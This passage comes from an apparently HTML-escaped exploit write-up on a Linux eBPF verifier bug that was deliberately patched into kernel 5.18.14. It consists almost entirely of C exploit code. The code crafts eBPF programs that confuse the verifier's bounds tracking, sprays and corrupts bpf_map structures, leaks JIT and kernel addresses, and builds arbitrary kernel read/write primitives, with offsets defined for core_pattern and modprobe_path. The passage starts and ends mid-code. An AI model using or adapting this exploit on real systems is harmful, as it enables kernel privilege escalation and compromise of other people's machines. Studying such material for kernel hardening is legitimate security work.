      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(key) = fp-0x10
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // call map_lookup_elem(mapfd, &amp;amp;key(-&amp;gt;0))
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),

      BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),  // r6 = r0 == map_elem
      BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0,
                  0),  // r7 = [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),  // r1 = r7
      BPF_ALU64_IMM(BPF_RSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0x00000000ffffffff)
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0xffffffff00000000)

      BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe),  // r2 = 0x00000000fffffffe
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_2,
                    32),  // r2 = (val=0xfffffffe00000000, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2,
                    1),  // r2 = (val=0xfffffffe00000001, mask=0)

      // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &amp;amp;
      // (~this.val)).
      // And if r1.mask == (u64)0, __mark_reg_known -&amp;gt;
      // ___mark_reg_known is called.
      // After this call, r1&amp;#39;s min and max will be set to imm.
      // Because (~0xffffffff00000001) &amp;amp; 0xffffffff00000000 == 0 and
      // (~0xfffffffe00000001) &amp;amp; 0xffffffff00000000 == 0x100000000, we must use
      // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe).
      BPF_ALU64_REG(BPF_OR, BPF_REG_1,
                    BPF_REG_2),  // r1 = (s32_min=1, s32_max=0, u32_min=1,
                                 // u32_max=0).
      BPF_MOV32_REG(BPF_REG_1, BPF_REG_1),  // r1(w1) = (s32_min=1, s32_max=0,
                                            // u32_min=1, u32_max=0).

      BPF_MOV64_REG(
          BPF_REG_2,
          BPF_REG_7),  // r2 = r7 == [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_ALU64_IMM(BPF_AND, BPF_REG_2,
                    0x1),  // r2 = (val=1, mask=0x1)
      BPF_ALU64_REG(BPF_ADD, BPF_REG_1,
                    BPF_REG_2),  // r1 = r1 + r2 == (actual_val = 2; s32_min=1,
                                 // s32_max=1, u32_min=1, u32_max=1) ==
                                 // (actual_val=2; val=1, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_1,
                    -1),  // r1 = r1 + -1 == (actual_val=1; val=0, mask=0)
      BPF_MOV64_REG(BPF_REG_8,
                    BPF_REG_1),  // r8 = r1 == (actual_val=1; val=0, mask=0)

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0),
      // arg3(to) = fp-0x20
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),      // arg3 = fp
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x20),  // arg3 = arg3(fp)-0x20
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG3,
                  -0x18),  // *(u64*)(fp-0x18) = arg3 == fp-0x20
      // arg4(len)
      BPF_MOV64_REG(BPF_REG_ARG4,
                    BPF_REG_8),  // arg4 = r8 == (actual_val=1; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_MUL, BPF_REG_ARG4,
          0x10 - 1),  // arg4 = 0x0f * arg4 == (actual_val=0x0f; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_ADD, BPF_REG_ARG4,
          1),  // arg4 = arg4 + 1 == (actual_val=0x10; val=0x1, mask=0)
      // skb_load_bytes(skb, 0, fp-0x20, (actual_val=0x10; val=0x1, mask=0))
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),  // fp-0x18 = addr

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0x10),
      // arg3(to) = addr
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG3, BPF_REG_FP,
                  -0x18),  // arg3 = fp-0x18 == addr
      // arg4(len)
      BPF_MOV64_IMM(BPF_REG_ARG4, 8),
      // skb_load_bytes(skb, 0x10, addr, 8)
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)&amp;#34;GPL v2&amp;#34;,
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &amp;amp;prog_attr);
  if (progfd &amp;lt; 0) {
    puts(&amp;#34;============[failed reason]============&amp;#34;);
    printf(&amp;#34;%s\n&amp;#34;, verifier_log);
    fatal(&amp;#34;bpf(BPF_PROG_LOAD)&amp;#34;);
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal(&amp;#34;socketpair&amp;#34;);
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;amp;progfd, sizeof(int))) {
    fatal(&amp;#34;setsockopt&amp;#34;);
  }

  uint64_t buf[] = {0xdeadbeefcafebebe, addr, val};
  write(socks[1], buf, sizeof(buf));

  close(socks[0]);
  close(socks[1]);
  close(progfd);

  return buf[0];
}
uint64_t aar64(uint64_t addr) {
  char verifier_log[0x10000];

  uint64_t map_val = 1;
  bpf_map_update(mapfd, 0, &amp;amp;map_val);

  struct bpf_insn insns[] = {
      // BPF_REG_ARG1 == struct __sk_buff
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1,
                  -0x08),  // *(u64*)(fp-0x08) = skb

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(key) = fp-0x10
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // call map_lookup_elem(mapfd, &amp;amp;key(-&amp;gt;0))
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),

      BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),  // r6 = r0 == map_elem
      BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0,
                  0),  // r7 = [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),  // r1 = r7
      BPF_ALU64_IMM(BPF_RSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0x00000000ffffffff)
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0xffffffff00000000)

      BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe),  // r2 = 0x00000000fffffffe
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_2,
                    32),  // r2 = (val=0xfffffffe00000000, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2,
                    1),  // r2 = (val=0xfffffffe00000001, mask=0)

      // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &amp;amp;
      // (~this.val)).
      // And if r1.mask == (u64)0, __mark_reg_known -&amp;gt;
      // ___mark_reg_known is called.
      // After this call, r1&amp;#39;s min and max will be set to imm.
      // Because (~0xffffffff00000001) &amp;amp; 0xffffffff00000000 == 0 and
      // (~0xfffffffe00000001) &amp;amp; 0xffffffff00000000 == 0x100000000, we must use
      // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe).
      BPF_ALU64_REG(BPF_OR, BPF_REG_1,
                    BPF_REG_2),  // r1 = (s32_min=1, s32_max=0, u32_min=1,
                                 // u32_max=0).
      BPF_MOV32_REG(BPF_REG_1, BPF_REG_1),  // r1(w1) = (s32_min=1, s32_max=0,
                                            // u32_min=1, u32_max=0).

      BPF_MOV64_REG(
          BPF_REG_2,
          BPF_REG_7),  // r2 = r7 == [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_ALU64_IMM(BPF_AND, BPF_REG_2,
                    0x1),  // r2 = (val=1, mask=0x1)
      BPF_ALU64_REG(BPF_ADD, BPF_REG_1,
                    BPF_REG_2),  // r1 = r1 + r2 == (actual_val = 2; s32_min=1,
                                 // s32_max=1, u32_min=1, u32_max=1) ==
                                 // (actual_val=2; val=1, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_1,
                    -1),  // r1 = r1 + -1 == (actual_val=1; val=0, mask=0)
      BPF_MOV64_REG(BPF_REG_8,
                    BPF_REG_1),  // r8 = r1 == (actual_val=1; val=0, mask=0)

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0),
      // arg3(to) = fp-0x20
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),      // arg3 = fp
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x20),  // arg3 = arg3(fp)-0x20
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_6,
                  -0x18),  // *(u64*)(fp-0x18) = arg3 == fp-0x20
      // arg4(len)
      BPF_MOV64_REG(BPF_REG_ARG4,
                    BPF_REG_8),  // arg4 = r8 == (actual_val=1; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_MUL, BPF_REG_ARG4,
          0x10 - 1),  // arg4 = 0x0f * arg4 == (actual_val=0x0f; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_ADD, BPF_REG_ARG4,
          1),  // arg4 = arg4 + 1 == (actual_val=0x10; val=0x1, mask=0)
      // skb_load_bytes(skb, 0, fp-0x20, (actual_val=0x10; val=0x1, mask=0))
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),  // fp-0x18 = addr

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(&amp;amp;key)
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // arg3(&amp;amp;val)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG3, BPF_REG_FP, -0x18),
      // arg4(flags)
      BPF_MOV64_IMM(BPF_REG_ARG4, 0),
      // map_update_elem(mapfd, &amp;amp;key, &amp;amp;val, 0)
      BPF_EMIT_CALL(BPF_FUNC_map_update_elem),

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)&amp;#34;GPL v2&amp;#34;,
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &amp;amp;prog_attr);
  if (progfd &amp;lt; 0) {
    puts(&amp;#34;============[failed reason]============&amp;#34;);
    printf(&amp;#34;%s\n&amp;#34;, verifier_log);
    fatal(&amp;#34;bpf(BPF_PROG_LOAD)&amp;#34;);
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal(&amp;#34;socketpair&amp;#34;);
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;amp;progfd, sizeof(int))) {
    fatal(&amp;#34;setsockopt&amp;#34;);
  }

  uint64_t buf[] = {0xdeadbeefcafebebe, addr};
  write(socks[1], buf, sizeof(buf));
  bpf_map_lookup(mapfd, 0, &amp;amp;map_val);

  close(socks[0]);
  close(socks[1]);
  close(progfd);

  return map_val;
}

uint64_t bpf_map_addr = 0;

int main() {
  srand(time(NULL));
  char verifier_log[0x10000];

  make_corrupted_map();
  find_corrupted_map_and_leak_bpf_map_addr();

  if (corrupted_map_fd == 0) {
    puts(&amp;#34;[-] Failed to find corrupted bpf_map&amp;#34;);
    return -1;
  }
  printf(&amp;#34;[+] mapfd: %d\n&amp;#34;, mapfd);
  printf(&amp;#34;[+] corrupted_map_fd: %d\n&amp;#34;, corrupted_map_fd);
  printf(&amp;#34;[+] bpf_map_addr: 0x%016lx\n&amp;#34;, bpf_map_addr);

  puts(&amp;#34;[*] Restore corrupted map...&amp;#34;);
  uint64_t bpf_map_ops = aar64(bpf_map_addr) + 8;
  aaw64(bpf_map_addr, bpf_map_ops);

  return 0;
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;


&lt;h4 id=&#34;leak-addr-of-jit-code-using-oob-read--heap-spray&#34;&gt;Leak addr of JIT code using oob read &amp;amp; heap spray&lt;/h4&gt;



  &lt;div class=&#34;collapsable-code&#34;&gt;
    &lt;input id=&#34;254613798&#34; type=&#34;checkbox&#34; checked /&gt;
    &lt;label for=&#34;254613798&#34;&gt;
      &lt;span class=&#34;collapsable-code__language&#34;&gt;c&lt;/span&gt;
      &lt;span class=&#34;collapsable-code__title&#34;&gt;leak_jit_addr_using_oob_read.c&lt;/span&gt;
      &lt;span class=&#34;collapsable-code__toggle&#34; data-label-expand=&#34;Show&#34; data-label-collapse=&#34;Hide&#34;&gt;&lt;/span&gt;
    &lt;/label&gt;
    &lt;pre class=&#34;language-c&#34; &gt;
      &lt;code&gt;// Patch location:
//    https://elixir.bootlin.com/linux/v5.18.14/source/kernel/bpf/verifier.c#L7957
// Diff:
//    7957c7957,7958
//    &amp;lt;               __mark_reg32_known(dst_reg, var32_off.value);
//    ---
//    &amp;gt;               // `scalar_min_max_or` will handle the case
//    &amp;gt;               //__mark_reg32_known(dst_reg, var32_off.value);

#include &amp;lt;asm-generic/socket.h&amp;gt;
#include &amp;lt;fcntl.h&amp;gt;
#include &amp;lt;linux/bpf.h&amp;gt;
#include &amp;lt;stdint.h&amp;gt;
#include &amp;lt;stdio.h&amp;gt;
#include &amp;lt;stdlib.h&amp;gt;
#include &amp;lt;string.h&amp;gt;
#include &amp;lt;sys/socket.h&amp;gt;
#include &amp;lt;sys/syscall.h&amp;gt;
#include &amp;lt;sys/types.h&amp;gt;
#include &amp;lt;time.h&amp;gt;
#include &amp;lt;unistd.h&amp;gt;

#include &amp;#34;bpf_insn.h&amp;#34;

#define KERNEL_BASE 0xffffffff81000000
#define BPF_MAP_OPS_OFFSET (0xffffffff81c124a0 - KERNEL_BASE)
#define BPF_MAP_OPS_LOOKUP_IDX 12
#define BPF_MAP_OPS_LOOKUP_ELEM_OFFSET \
  (BPF_MAP_OPS_OFFSET + BPF_MAP_OPS_LOOKUP_IDX * 8)
#define BPF_MAP_OPS_UPDATE_ELEM_IDX 13
#define BPF_MAP_OPS_UPDATE_ELEM_OFFSET \
  (BPF_MAP_OPS_OFFSET + BPF_MAP_OPS_UPDATE_ELEM_IDX * 8)
#define OPS_CONTAINING_RET_OFFSET (0xffffffff81c15fc8 - KERNEL_BASE)
#define CORE_PATTERN_OFFSET (0xffffffff81eb25e0 - KERNEL_BASE)
#define MODBPROB_OFFSET (0xffffffff81e37fe0 - KERNEL_BASE)

void get_enter_to_continue(const char* msg) {
  puts(msg);
  getchar();
}

void fatal(const char* msg) {
  perror(msg);
  // get_enter_to_continue(&amp;#34;Press enter to exit...&amp;#34;);
  exit(-1);
}

int bpf(int cmd, union bpf_attr* attrs) {
  return syscall(__NR_bpf, cmd, attrs, sizeof(*attrs));
}

int bpf_map_create(int val_size, int max_entries) {
  union bpf_attr attr = {
      .map_type = BPF_MAP_TYPE_ARRAY,
      .key_size = sizeof(int),
      .value_size = val_size,
      .max_entries = max_entries,
  };

  int map_fd = bpf(BPF_MAP_CREATE, &amp;amp;attr);
  if (map_fd &amp;lt; 0) {
    fatal(&amp;#34;bpf(BPF_MAP_CREATE)&amp;#34;);
  }

  return map_fd;
}
int bpf_map_update(int map_fd, int key, void* pval) {
  union bpf_attr attr = {
      .map_fd = map_fd,
      .key = (uint64_t)&amp;amp;key,
      .value = (uint64_t)pval,
      .flags = BPF_ANY,
  };

  int res = bpf(BPF_MAP_UPDATE_ELEM, &amp;amp;attr);
  if (res &amp;lt; 0) {
    fatal(&amp;#34;bpf(BPF_MAP_UPDATE_ELEM)&amp;#34;);
  }

  return res;
}
int bpf_map_lookup(int map_fd, int key, void* pval) {
  union bpf_attr attr = {
      .map_fd = map_fd,
      .key = (uint64_t)&amp;amp;key,
      .value = (uint64_t)pval,
      .flags = BPF_ANY,
  };

  return bpf(BPF_MAP_LOOKUP_ELEM, &amp;amp;attr);
}

int mapfd;
int map_spray_fd[0x100];
void make_corrupted_map() {
  uint64_t map_val = 1;

  puts(&amp;#34;[*] Spray struct bpf_map...&amp;#34;);
  for (int i = 0; i &amp;lt; sizeof(map_spray_fd) / 4; i++) {
    map_spray_fd[i] = bpf_map_create(sizeof(uint64_t), 1);
    bpf_map_update(map_spray_fd[i], 0, &amp;amp;map_val);
  }
  mapfd = map_spray_fd[0x81];

  char verifier_log[0x10000];

  bpf_map_update(mapfd, 0, &amp;amp;map_val);

  struct bpf_insn insns[] = {
      // BPF_REG_ARG1 == struct __sk_buff
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1,
                  -0x08),  // *(u64*)(fp-0x08) = skb

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(key) = fp-0x10
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // call map_lookup_elem(mapfd, &amp;amp;key(-&amp;gt;0))
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),

      BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),  // r6 = r0 == map_elem
      BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0,
                  0),  // r7 = [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),  // r1 = r7
      BPF_ALU64_IMM(BPF_RSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0x00000000ffffffff)
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0xffffffff00000000)

      BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe),  // r2 = 0x00000000fffffffe
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_2,
                    32),  // r2 = (val=0xfffffffe00000000, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2,
                    1),  // r2 = (val=0xfffffffe00000001, mask=0)

      // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &amp;amp;
      // (~this.val)).
      // And if r1.mask == (u64)0, __mark_reg_known -&amp;gt;
      // ___mark_reg_known is called.
      // After this call, r1&amp;#39;s min and max will be set to imm.
      // Because (~0xffffffff00000001) &amp;amp; 0xffffffff00000000 == 0 and
      // (~0xfffffffe00000001) &amp;amp; 0xffffffff00000000 == 0x100000000, we must use
      // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe).
      BPF_ALU64_REG(BPF_OR, BPF_REG_1,
                    BPF_REG_2),  // r1 = (s32_min=1, s32_max=0, u32_min=1,
                                 // u32_max=0).
      BPF_MOV32_REG(BPF_REG_1, BPF_REG_1),  // r1(w1) = (s32_min=1, s32_max=0,
                                            // u32_min=1, u32_max=0).

      BPF_MOV64_REG(
          BPF_REG_2,
          BPF_REG_7),  // r2 = r7 == [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_ALU64_IMM(BPF_AND, BPF_REG_2,
                    0x1),  // r2 = (val=1, mask=0x1)
      BPF_ALU64_REG(BPF_ADD, BPF_REG_1,
                    BPF_REG_2),  // r1 = r1 + r2 == (actual_val = 2; s32_min=1,
                                 // s32_max=1, u32_min=1, u32_max=1) ==
                                 // (actual_val=2; val=1, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_1,
                    -1),  // r1 = r1 + -1 == (actual_val=1; val=0, mask=0)
      BPF_MOV64_REG(BPF_REG_8,
                    BPF_REG_1),  // r8 = r1 == (actual_val=1; val=0, mask=0)

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0),
      // arg3(to) = map_elem
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_6),  // arg3 = r6 == map_elem
      // arg4(len)
      BPF_MOV64_REG(BPF_REG_ARG4,
                    BPF_REG_8),  // arg4 = r8 == (actual_val=1; val=0, mask=0)
      BPF_ALU64_IMM(BPF_MUL, BPF_REG_ARG4,
                    0xf2 - 1),  // arg4 = (0xf2-1) * arg4 == (actual_val=0xf2-1;
                                // val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_ADD, BPF_REG_ARG4,
          1),  // arg4 = arg4 + 1 == (actual_val=0xf2; val=0x1, mask=0)
      // skb_load_bytes(skb, 0, fp-0x20, (actual_val=0xf2; val=0x1, mask=0))
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),  // fp-0x18 = addr

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)&amp;#34;GPL v2&amp;#34;,
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &amp;amp;prog_attr);
  if (progfd &amp;lt; 0) {
    puts(&amp;#34;============[failed reason]============&amp;#34;);
    printf(&amp;#34;%s\n&amp;#34;, verifier_log);
    fatal(&amp;#34;bpf(BPF_PROG_LOAD)&amp;#34;);
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal(&amp;#34;socketpair&amp;#34;);
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;amp;progfd, sizeof(int))) {
    fatal(&amp;#34;setsockopt&amp;#34;);
  }

  char buf[0x100] = {
      0,
  };
  // Overwrite low byte of bpf_map-&amp;gt;ops
  // (https://elixir.bootlin.com/linux/v5.18.14/source/include/linux/bpf.h#L63)
  uint16_t ops_containing_ret_offset =
      (OPS_CONTAINING_RET_OFFSET - 8 * BPF_MAP_OPS_UPDATE_ELEM_IDX) &amp;amp; 0xffff;
  printf(&amp;#34;ops_containing_ret_offset: 0x%x\n&amp;#34;, ops_containing_ret_offset);
  *(uint16_t*)(&amp;amp;buf[0xf0]) = ops_containing_ret_offset;
  write(socks[1], buf, sizeof(buf));

  close(socks[0]);
  close(socks[1]);
  close(progfd);
}

int corrupted_map_fd;
uint64_t jit_addr;
void find_corrupted_map_and_leak_bpf_map_addr() {
  char verifier_log[0x10000];

  for (int i = 0; i &amp;lt; sizeof(map_spray_fd) / 4; ++i) {
    int cur_map_fd = map_spray_fd[i];
    if (cur_map_fd == mapfd) {
      continue;
    }

    // uint64_t map_val = 0;
    // int ret = bpf_map_update(cur_map_fd, 0, &amp;amp;map_val);
    // printf(&amp;#34;ret: 0x%x, val: 0x%lx\n&amp;#34;, ret, map_val);

    struct bpf_insn insns[] = {
        // BPF_REG_ARG1 == struct __sk_buff
        BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1,
                    -0x08),  // *(u64*)(fp-0x08) = skb

        // arg1(mapfd)
        BPF_LD_MAP_FD(BPF_REG_ARG1, cur_map_fd),
        // arg2(&amp;amp;key) = fp-0x10 &amp;lt;- 0
        BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
        BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
        // arg3(&amp;amp;val) = fp-0x10 &amp;lt;- 0
        BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_ARG2),
        // arg4(flags)
        BPF_MOV64_IMM(BPF_REG_ARG4, 0),
        // map_update_elem(mapfd, fp-0x10, fp-0x10, 0) or map_lookup_elem(mapfd,
        // fp-0x10) if corrupted
        BPF_EMIT_CALL(BPF_FUNC_map_update_elem),
        BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_0, -0x18),

        // arg1(mapfd)
        BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
        // arg2(&amp;amp;key) = fp-0x10 &amp;lt;- 0
        BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
        BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
        // arg3(&amp;amp;val) = fp-0x18 &amp;lt;- return value of map_update_elem or
        // map_lookup_elem.
        BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x18),
        // arg4(flags)
        BPF_MOV64_IMM(BPF_REG_ARG4, 0),
        // map_update_elem(mapfd, fp-0x10, fp-0x18, 0)
        BPF_EMIT_CALL(BPF_FUNC_map_update_elem),

        BPF_MOV64_IMM(BPF_REG_0, 0),
        BPF_EXIT_INSN(),
    };

    union bpf_attr prog_attr = {
        .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
        .insn_cnt = sizeof(insns) / sizeof(insns[0]),
        .insns = (uint64_t)insns,
        .license = (uint64_t)&amp;#34;GPL v2&amp;#34;,
        .log_level = 2,
        .log_size = sizeof(verifier_log),
        .log_buf = (uint64_t)verifier_log,
    };

    int progfd = bpf(BPF_PROG_LOAD, &amp;amp;prog_attr);
    if (progfd &amp;lt; 0) {
      puts(&amp;#34;============[failed reason]============&amp;#34;);
      printf(&amp;#34;%s\n&amp;#34;, verifier_log);
      fatal(&amp;#34;bpf(BPF_PROG_LOAD)&amp;#34;);
    }

    int socks[2];
    if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
      fatal(&amp;#34;socketpair&amp;#34;);
    }
    if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;amp;progfd, sizeof(int))) {
      fatal(&amp;#34;setsockopt&amp;#34;);
    }

    write(socks[1], &amp;#34;Hello&amp;#34;, 5);

    uint64_t val;
    bpf_map_lookup(mapfd, 0, &amp;amp;val);

    close(socks[0]);
    close(socks[1]);
    close(progfd);

    if (val != 0) {
      jit_addr = val;
      corrupted_map_fd = cur_map_fd;
      return;
    }
  }
}

uint64_t aaw64(uint64_t addr, uint64_t val) {
  char verifier_log[0x10000];

  uint64_t map_val = 1;
  bpf_map_update(mapfd, 0, &amp;amp;map_val);

  struct bpf_insn insns[] = {
      // BPF_REG_ARG1 == struct __sk_buff
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1,
                  -0x08),  // *(u64*)(fp-0x08) = skb

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(key) = fp-0x10
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // call map_lookup_elem(mapfd, &amp;amp;key(-&amp;gt;0))
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),

      BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),  // r6 = r0 == map_elem
      BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0,
                  0),  // r7 = [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),  // r1 = r7
      BPF_ALU64_IMM(BPF_RSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0x00000000ffffffff)
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0xffffffff00000000)

      BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe),  // r2 = 0x00000000fffffffe
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_2,
                    32),  // r2 = (val=0xfffffffe00000000, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2,
                    1),  // r2 = (val=0xfffffffe00000001, mask=0)

